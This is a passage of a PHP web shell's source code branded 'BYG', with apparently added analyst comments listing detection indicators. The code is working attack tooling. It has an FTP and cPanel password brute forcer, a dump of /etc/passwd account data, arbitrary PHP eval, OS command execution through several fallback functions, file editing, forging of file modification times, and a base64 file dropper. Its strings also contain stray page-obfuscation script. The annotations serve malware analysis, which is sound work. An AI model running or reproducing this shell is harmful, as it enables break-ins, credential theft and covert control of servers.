1241 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1242 <b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1243 <div align='center'><br>
1244 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1245 <tr>
1246 <td align='center'>
1247 <b>Username</b></td>
1248 <td>
1249 <p align='center'>
1250 <b>Password</b></td>
1251 </tr>
1252 </table>
1253 <p align='center'>
1254 <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1255 $i = 0;
1256 while ($i < 60000) {
1257 $line = posix_getpwuid($i);
1258 if (!empty($line)) {
1259 while (list($key, $vba_etcpwd) = each($line)) {
1260 echo "" . $vba_etcpwd . "\n";
1261 break;
1262 }
1263 }
1264 $i++;
1265 }
1266 echo "
1267 </textarea>
1268 <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1269 <br>
1270 <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1271 <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1272 </td></tr></table></td></tr></form><p align= 'left'>";
1273 ?>
1274 <?php
/**
 * Try one FTP user/password pair against $host with cURL and print the pair when the request succeeds.
 *
 * NOTE(review): this is the FTP half of the page's "Brute Forcer" action; the loop later in the same
 * branch calls it once per user/password combination. On a server where this file is found, a burst
 * of failed FTP logins coming from the web server itself would be the expected log trace — confirm
 * against the FTP daemon's auth log.
 *
 * $host     target host, interpolated unescaped into the ftp:// URL
 * $user     user name to try
 * $pass     password to try
 * $timeout  connect timeout in seconds (passed to CURLOPT_CONNECTTIMEOUT)
 *
 * Returns nothing. cURL errno 28 prints an error and ends the whole script through exit;
 * errno 0 prints the pair; any other cURL error is ignored without output.
 */
1275 function ftp_check($host, $user, $pass, $timeout) {
1276 $ch = curl_init();
1277 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1278 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// CURLOPT_HTTPAUTH is an HTTP option; on an ftp:// URL it presumably has no effect
// (looks copied from cpanel_check) — TODO confirm.
1279 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1280 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1281 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1282 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1283 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// $data is assigned but never read; only the cURL error code decides the outcome.
1284 $data = curl_exec($ch);
// 28 is cURL's "operation timed out" code. exit stops the script here, so curl_close() below
// is not reached on this path.
1285 if (curl_errno($ch) == 28) {
1286 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1287 exit;
1288 } elseif (curl_errno($ch) == 0) {
// The script text between "attack@vbateam.net" and "]#" references data-cfemail and looks like
// residue of the hosting page's e-mail obfuscation rather than original program text — TODO
// confirm against a clean copy. $user, $pass and $host are written into the HTML unescaped, and
// the "Login" link points at port 2082 over http although this function tested FTP.
1289 p("<b>[ attack@vbateam.net
1290 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b>
1291 <b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1292 }
1293 curl_close($ch);
1294 }
/**
 * Try one user/password pair with HTTP Basic authentication against http://$host:2082 and print the
 * pair when the request succeeds.
 *
 * NOTE(review): this is the "cpanel" half of the page's "Brute Forcer" action; the loop later in the
 * same branch calls it once per user/password combination. The URL is plain http, so each guessed
 * pair crosses the network unencrypted. Repeated 401 responses on port 2082 for requests coming from
 * the web server itself would be the expected log trace — confirm against the panel's access log.
 *
 * $host     target host, interpolated unescaped into the URL
 * $user     user name to try
 * $pass     password to try
 * $timeout  connect timeout in seconds (passed to CURLOPT_CONNECTTIMEOUT)
 *
 * Returns nothing. cURL errno 28 prints an error and ends the whole script through exit;
 * errno 0 prints the pair; any other cURL error is ignored without output.
 */
1295 function cpanel_check($host, $user, $pass, $timeout) {
1296 $ch = curl_init();
1297 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1298 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1299 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1300 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1301 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
// With CURLOPT_FAILONERROR set, an HTTP status of 400 or above is reported as a cURL error,
// so a rejected login does not reach the errno 0 branch below.
1302 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// $data is assigned but never read; only the cURL error code decides the outcome.
1303 $data = curl_exec($ch);
// 28 is cURL's "operation timed out" code. exit stops the script here, so curl_close() below
// is not reached on this path.
1304 if (curl_errno($ch) == 28) {
1305 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1306 exit;
1307 } elseif (curl_errno($ch) == 0) {
// The script text between "attack@vbateam.net" and "]#" references data-cfemail and looks like
// residue of the hosting page's e-mail obfuscation rather than original program text — TODO
// confirm against a clean copy. $user and $pass are written into the HTML unescaped.
1308 p("<b>[ attack@vbateam.net
1309 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1310 }
1311 curl_close($ch);
1312 }
1313 if (isset($submit) && !empty($submit)) {
1314 $userlist = explode("\n", $users);
1315 $passlist = explode("\n", $pass);
1316 p('<b>[ attack@vbateam.net
1317 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# Attacking ...</font></b><br>');
1318 foreach ($userlist as $user) {
1319 $_user = trim($user);
1320 foreach ($passlist as $password) {
1321 $_pass = trim($password);
1322 if ($option == "ftp") {
1323 ftp_check($target, $_user, $_pass, $connect_timeout);
1324 }
1325 if ($option == "cpanel") {
1326 cpanel_check($target, $_user, $_pass, $connect_timeout);
1327 }
1328 }
1329 }
1330 }
1331 formfoot();
1332 } elseif ($action == 'etcpwd') {
1333 formhead(array('title' => 'Get /etc/passwd'));
1334 makehide('action', 'etcpwd');
1335 makehide('dir', $nowpath);
1336 $i = 0;
1337 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1338 while ($i < 60000) {
1339 $line = posix_getpwuid($i);
1340 if (!empty($line)) {
1341 while (list($key, $vba_etcpwd) = each($line)) {
1342 echo "" . $vba_etcpwd . "\n";
1343 break;
1344 }
1345 }
1346 $i++;
1347 }
1348 echo "</textarea></p>";
1349 formfoot();
1350 } elseif ($action == 'eval') {
1351 $phpcode = trim($phpcode);
1352 if ($phpcode) {
1353 if (!preg_match('#<\?#si', $phpcode)) {
1354 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1355 }
1356 eval("?" . ">$phpcode<?");
1357 }
1358 formhead(array('title' => 'Eval PHP Code'));
1359 makehide('action', 'eval');
1360 maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1361 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1362 formfooter();
1363 } //end eval
1364 elseif ($action == 'editfile') {
1365 if (file_exists($opfile)) {
1366 $fp = @fopen($opfile, 'r');
1367 $contents = @fread($fp, filesize($opfile));
1368 @fclose($fp);
1369 $contents = htmlspecialchars($contents);
1370 }
1371 formhead(array('title' => 'Create / Edit File'));
1372 makehide('action', 'file');
1373 makehide('dir', $nowpath);
1374 makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1375 maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1376 formfooter();
1377 } //end editfile
1378 elseif ($action == 'newtime') {
1379 $opfilemtime = @filemtime($opfile);
1380 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1381 $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1382 formhead(array('title' => 'Clone file was last modified time'));
1383 makehide('action', 'file');
1384 makehide('dir', $nowpath);
1385 makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1386 makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1387 formfooter();
1388 formhead(array('title' => 'Set last modified'));
1389 makehide('action', 'file');
1390 makehide('dir', $nowpath);
1391 makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1392 p('<p>Instead »');
1393 p('year:');
1394 makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1395 p('month:');
1396 makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1397 p('day:');
1398 makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1399 p('hour:');
1400 makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1401 p('minute:');
1402 makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1403 p('second:');
1404 makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1405 p('</p>');
1406 formfooter();
1407 } //end newtime
1408 elseif ($action == 'shell') {
1409 if (IS_WIN && IS_COM) {
1410 if ($program && $parameter) {
1411 $shell = new COM('Shell.Application');
1412 $a = $shell->ShellExecute($program, $parameter);
1413 m('Program run has ' . (!$a ? 'success' : 'fail'));
1414 }
1415 !$program && $program = 'c:\windows\system32\cmd.exe';
1416 !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1417 formhead(array('title' => 'Execute Program'));
1418 makehide('action', 'shell');
1419 makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1420 p('<p>');
1421 makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1422 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1423 p('</p>');
1424 formfoot();
1425 }
1426 formhead(array('title' => 'Execute Command'));
1427 makehide('action', 'shell');
1428 if (IS_WIN && IS_COM) {
1429 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1430 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1431 }
1432 p('<p>');
1433 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1434 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1435 p('</p>');
1436 formfoot();
1437 if ($command) {
1438 p('<hr width="100%" noshade /><pre>');
1439 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1440 $wsh = new COM('WScript.shell');
1441 $exec = $wsh->exec('cmd.exe /c ' . $command);
1442 $stdout = $exec->StdOut();
1443 $stroutput = $stdout->ReadAll();
1444 echo $stroutput;
1445 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1446 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1447 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1448 if (is_resource($process)) {
1449 fwrite($pipes[0], $command . "\r\n");
1450 fwrite($pipes[0], "exit\r\n");
1451 fclose($pipes[0]);
1452 while (!feof($pipes[1])) {
1453 echo fgets($pipes[1], 1024);
1454 }
1455 fclose($pipes[1]);
1456 while (!feof($pipes[2])) {
1457 echo fgets($pipes[2], 1024);
1458 }
1459 fclose($pipes[2]);
1460 proc_close($process);
1461 }
1462 } else {
1463 echo (execute($command));
1464 }
1465 p('</pre>');
1466 }
1467 } //end shell
1468 elseif ($action == 'phpenv') {
1469 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1470 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1471 !$dis_func && $dis_func = 'No';
1472 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1473 if ($phpvarname) {
1474 m($phpvarname . ' : ' . getcfg($phpvarname));
1475 }
1476 formhead(array('title' => 'Server environment'));
1477 makehide('action', 'phpenv');
1478 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1479 formfooter();
1480 $hp = array(0 => 'Server', 1 => 'PHP');
1481 for ($a = 0;$a < 2;$a++) {
1482 p('<h2>' . $hp[$a] . ' »</h2>');
1483 p('<ul class="info">');
1484 if ($a == 0) {
1485 for ($i = 1;$i <= 9;$i++) {
1486 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1487 }
1488 } elseif ($a == 1) {
1489 for ($i = 10;$i <= 23;$i++) {
1490 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1491 }
1492 }
1493 p('</ul>');
1494 }
1495 } //end phpenv
1496 else {
1497 m('Undefined Action');
1498 }
1499 ?>
1500 </td></tr></table>
1501 <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1502 <span style="float:right;"><?php debuginfo();
1503 ob_end_flush(); ?></span>
1504 Copyright (C) 2004-2010 <B></B> - Develop by <a href=http://beyeugroup.com target=_blank><B>BYG </B></a> - <B>- The Legend of Vietnamese Hacker World</B> All Rights Reserved.
1505 </div>
1506 </body>
1507 </html>
1508
1509 <?php
1510 /*======================================================
1511 Show info shell
1512 ======================================================*/
/**
 * Print a message inside a centred, bordered banner <div>.
 *
 * The message is written to the response as given; this function applies
 * no HTML escaping.
 *
 * @param string $msg Text or markup to display.
 */
function m($msg) {
    $banner = '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
    echo $banner . $msg . '</div>';
}
/**
 * Set a cookie using the settings held in the global $admin array.
 *
 * Analyst note: the Secure flag is derived only from SERVER_PORT == 443 and
 * setcookie() is called without an HttpOnly argument, so on plain-HTTP
 * deployments the cookie value travels in clear text and is visible in
 * proxy or packet captures.
 *
 * @param string $key    Cookie name; $admin['cookiepre'] is prepended when $prefix is truthy.
 * @param string $value  Cookie value.
 * @param int    $life   Lifetime in seconds added to $timestamp; 0 falls back to $admin['cookielife'].
 * @param int    $prefix Truthy to apply the configured cookie prefix.
 */
function scookie($key, $value, $life = 0, $prefix = 1) {
    global $admin, $timestamp, $_SERVER;
    $key = ($prefix ? $admin['cookiepre'] : '') . $key;
    // A zero/empty lifetime means "use the configured default".
    $life = $life ? $life : $admin['cookielife'];
    // Secure flag is set only for requests on port 443.
    $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
    setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
}
/**
 * Build the HTML pager ("First / Prev / [n] / Next / Last") for a result set.
 *
 * Each link is a javascript: URL calling the page's settable() function with
 * the table name and target page. $tablename is concatenated into that URL
 * without any escaping.
 *
 * @param int    $num       Total number of rows.
 * @param int    $perpage   Rows shown per page.
 * @param int    $curpage   Current page number (1-based, as used by the links).
 * @param string $tablename Table name passed through to settable().
 * @return string Pager markup wrapped in <p>, or '' when everything fits on one page.
 */
function multi($num, $perpage, $curpage, $tablename) {
    $multipage = '';
    if ($num > $perpage) {
        $page = 10;   // maximum number of numbered links shown at once
        $offset = 5;  // how many links precede the current page
        $pages = @ceil($num / $perpage);
        if ($page > $pages) {
            // Fewer pages than the window size: show them all.
            $from = 1;
            $to = $pages;
        } else {
            $from = $curpage - $offset;
            $to = $curpage + $page - $offset - 1;
            if ($from < 1) {
                // Window ran off the left edge; clamp to page 1.
                $to = $curpage + 1 - $from;
                $from = 1;
                if (($to - $from) < $page && ($to - $from) < $pages) {
                    $to = $page;
                }
            } elseif ($to > $pages) {
                // Window ran off the right edge; clamp to the last page.
                $from = $curpage - $pages + $to;
                $to = $pages;
                if (($to - $from) < $page && ($to - $from) < $pages) {
                    $from = $pages - $page + 1;
                }
            }
        }
        $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
        for ($i = $from;$i <= $to;$i++) {
            // The current page is plain text; every other page is a link.
            $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
        }
        $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
        $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
    }
    return $multipage;
}
1560 // Login page
/**
 * Emit the password prompt and terminate the request.
 *
 * Analyst note: the response is a near-empty page containing a single POST
 * form with a `password` field and a hidden `doing=login` field, submitted
 * to the same URL (action=""). Those two parameter names in a POST body,
 * together with the page <title> below, are usable as log and content
 * indicators for this sample. The function never returns; it calls exit.
 */
function loginpage() {
?>
<html>
<head>

<body bgcolor=black background=1.jpg>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>BYG - The Legend of Vietnamese Hacker World </title>
<style type="text/css">
A:link {text-decoration: none; color: green }
A:visited {text-decoration: none;color:red}
A:active {text-decoration: none}
A:hover {text-decoration: underline; color: green;}
input, textarea, button
{
font-size: 11pt;
color: #FFFFFF;
font-family: verdana, sans-serif;
background-color: #000000;
border-left: 2px dashed #8B0000;
border-top: 2px dashed #8B0000;
border-right: 2px dashed #8B0000;
border-bottom: 2px dashed #8B0000;
}

</style>

<BR><BR>
<div align=center >

<div>
<font color=gray>
<br /><br /><br /><br /><br />

<form method="POST" action="">
<span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
<input type="hidden" name="doing" value="login">
<input type="submit" value="Login">
</form>
<BR>
<?php
    // NOTE(review): $err_mess is neither a parameter nor declared global in
    // this function, so as written this looks like it prints an empty string.
    echo "" . $err_mess . "";
?>

<B><font color=red>






</div>


</fieldset>



</head>
</html>


<?php
    exit;
} //end loginpage()
/**
 * Run an operating-system command and return whatever it printed.
 *
 * Analyst note: this is the command-execution primitive of the sample. It
 * walks a fixed fallback chain (exec, shell_exec, system, passthru, popen)
 * and uses the first one available, with every call error-suppressed via
 * `@`. That chain of five process-spawning functions inside one function is
 * a strong static signature for web-shell scanners. On the host side, the
 * observable effect is the web-server/PHP worker spawning child processes;
 * restricting these functions through the `disable_functions` ini setting
 * and alerting on shells spawned by the web-server account are the matching
 * controls.
 *
 * @param string $cfe Command line passed unmodified to the chosen function.
 * @return string Captured output; '' when $cfe is empty or no method was usable.
 */
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            // exec() fills $res with an array of output lines; join them back.
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            // system() prints directly, so capture it with output buffering.
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            // Same buffering approach for passthru().
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            // Last resort: read the command's stdout through a pipe.
            $res = '';
            while (!@feof($f)) {
                $res.= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
/**
 * Resolve a program name to a path by running `which` through execute().
 *
 * Analyst note: $pr is interpolated into the command string as-is, so this
 * call shows up in process telemetry as `which <name>` spawned by the PHP
 * worker.
 *
 * @param string $pr Program name.
 * @return string Output of `which`, or $pr unchanged when that output is empty.
 */
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
/**
 * Write a base64-encoded blob to disk in decoded form.
 *
 * Analyst note: this is a file-dropping helper. The payload is carried
 * through the script as base64 text and only becomes its real content when
 * written, so content inspection of the request or of this source will not
 * show the decoded bytes. File-integrity monitoring on web-writable
 * directories is the control that catches the resulting file.
 *
 * @param string $fname Destination path, opened with mode 'w' (truncates).
 * @param string $text  Base64 text; decoded before being written.
 * @return void Failure to open the file is silently ignored.
 */
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, base64_decode($text));
        @fclose($fp);
    }
}
1665 // Debug
/**
 * Print how long the request has been running.
 *
 * Reads the global $starttime (seconds, as a float) and echoes the elapsed
 * time formatted to six decimal places.
 */
function debuginfo() {
    global $starttime;
    // microtime() without arguments yields "usec sec".
    $parts = explode(' ', microtime());
    $elapsed = $parts[1] + $parts[0] - $starttime;
    echo 'Processed in ' . number_format($elapsed, 6) . ' second(s)';
}
1672 // Function connect database
/**
 * Open a MySQL connection with the legacy mysql_* API and optionally select
 * a database and connection character set.
 *
 * Analyst note: host, port and credentials all come from the caller, so this
 * lets the script connect from the web server to any database it can reach;
 * database audit logs will show the web host as the client. The mysql_*
 * functions used here were removed in PHP 7.0, which helps date the sample
 * and the runtimes it can run on.
 *
 * @param string $dbhost  Server host name or address.
 * @param string $dbuser  User name.
 * @param string $dbpass  Password.
 * @param string $dbname  Database to select; skipped when empty.
 * @param string $charset One of gbk, big5, utf8 (case-insensitive); anything else is ignored.
 * @param string $dbport  TCP port appended to the host as "host:port".
 * @return resource Connection link. The request is terminated on connect or select failure.
 */
function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
    if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
        p('<h2>Can not connect to MySQL server</h2>');
        exit;
    }
    if ($link && $dbname) {
        if (!@mysql_select_db($dbname, $link)) {
            p('<h2>Database selected has error</h2>');
            exit;
        }
    }
    // Version check is a plain string comparison against '4.1'.
    if ($link && mysql_get_server_info() > '4.1') {
        if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
            // q() as defined in this file accepts only $sql; the extra $link argument is ignored.
            q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
        }
    }
    return $link;
}
1691 // Array strip
/**
 * Recursively apply stripslashes() to a string or to every string inside a
 * (possibly nested) array.
 *
 * The argument is taken by reference and is modified in place; the cleaned
 * value is also returned. Values that are neither strings nor arrays are
 * returned untouched.
 *
 * @param mixed $array String, array, or any other value.
 * @return mixed The same value with backslash escaping removed from strings.
 */
function s_array(&$array) {
    if (is_string($array)) {
        $array = stripslashes($array);
    } elseif (is_array($array)) {
        foreach (array_keys($array) as $idx) {
            $array[$idx] = s_array($array[$idx]);
        }
    }
    return $array;
}
1702 // HTML Strip
/**
 * Escape text for HTML display and turn newlines into <br />.
 *
 * NOTE(review): as this listing shows them, the last two replacements swap a
 * space for a space and a tab for spaces; the original file presumably used
 * HTML entities that were decoded when the page was captured — confirm
 * against a raw copy before relying on this.
 *
 * @param string $content Raw text.
 * @return string Text safe to place in element content.
 */
function html_clean($content) {
    $content = htmlspecialchars($content);
    $content = str_replace("\n", "<br />", $content);
    $content = str_replace(" ", " ", $content);
    $content = str_replace("\t", " ", $content);
    return $content;
}
1710 // Chmod
/**
 * Return the permission bits of a path as a four-digit octal string
 * (for example "0644").
 *
 * @param string $filepath Path to inspect; errors from fileperms() are suppressed.
 * @return string Last four characters of the octal mode.
 */
function getChmod($filepath) {
    $mode = @fileperms($filepath);
    $octal = base_convert($mode, 10, 8);
    return substr($octal, -4);
}
/**
 * Render a path's mode as an `ls -l` style string such as "drwxr-xr-x".
 *
 * NOTE(review): the directory test (0x4000) runs before the block-device
 * test (0x6000). Because 0x6000 has the 0x4000 bit set, a block device would
 * be reported as 'd' and the 'b' branch looks unreachable.
 *
 * @param string $filepath Path to inspect; errors from fileperms() are suppressed.
 * @return string Ten characters: file type followed by owner/group/world rwx triplets.
 */
function getPerms($filepath) {
    $mode = @fileperms($filepath);
    // File-type bits.
    if (($mode & 0xC000) === 0xC000) {
        $type = 's';
    } elseif (($mode & 0x4000) === 0x4000) {
        $type = 'd';
    } elseif (($mode & 0xA000) === 0xA000) {
        $type = 'l';
    } elseif (($mode & 0x8000) === 0x8000) {
        $type = '-';
    } elseif (($mode & 0x6000) === 0x6000) {
        $type = 'b';
    } elseif (($mode & 0x2000) === 0x2000) {
        $type = 'c';
    } elseif (($mode & 0x1000) === 0x1000) {
        $type = 'p';
    } else {
        $type = '?';
    }
    // Read / write / execute bits for owner, group and world.
    $owner['read'] = ($mode & 00400) ? 'r' : '-';
    $owner['write'] = ($mode & 00200) ? 'w' : '-';
    $owner['execute'] = ($mode & 00100) ? 'x' : '-';
    $group['read'] = ($mode & 00040) ? 'r' : '-';
    $group['write'] = ($mode & 00020) ? 'w' : '-';
    $group['execute'] = ($mode & 00010) ? 'x' : '-';
    $world['read'] = ($mode & 00004) ? 'r' : '-';
    $world['write'] = ($mode & 00002) ? 'w' : '-';
    $world['execute'] = ($mode & 00001) ? 'x' : '-';
    // 0x800 / 0x400 / 0x200 overlay the execute column with s/S, s/S and t/T.
    if ($mode & 0x800) {
        $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
    }
    if ($mode & 0x400) {
        $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
    }
    if ($mode & 0x200) {
        $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
    }
    return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
}
/**
 * Build an HTML link showing the owning account of a path.
 *
 * Analyst note: every field returned by posix_getpwuid() for the file owner
 * (name, passwd field, uid, gid, gecos, home directory, login shell) is
 * written into the link's title attribute, so local account details leave
 * the host in ordinary page responses. None of the values are HTML-escaped.
 *
 * @param string $filepath Path whose owner is looked up.
 * @return string ' / <a ...>name</a>' markup, or '' when the POSIX function
 *                is unavailable or the lookup fails.
 */
function getUser($filepath) {
    if (function_exists('posix_getpwuid')) {
        $array = @posix_getpwuid(@fileowner($filepath));
        if ($array && is_array($array)) {
            // The literal newlines inside the string become line breaks in the tooltip.
            return ' / <a href="#" title="User: ' . $array['name'] . '
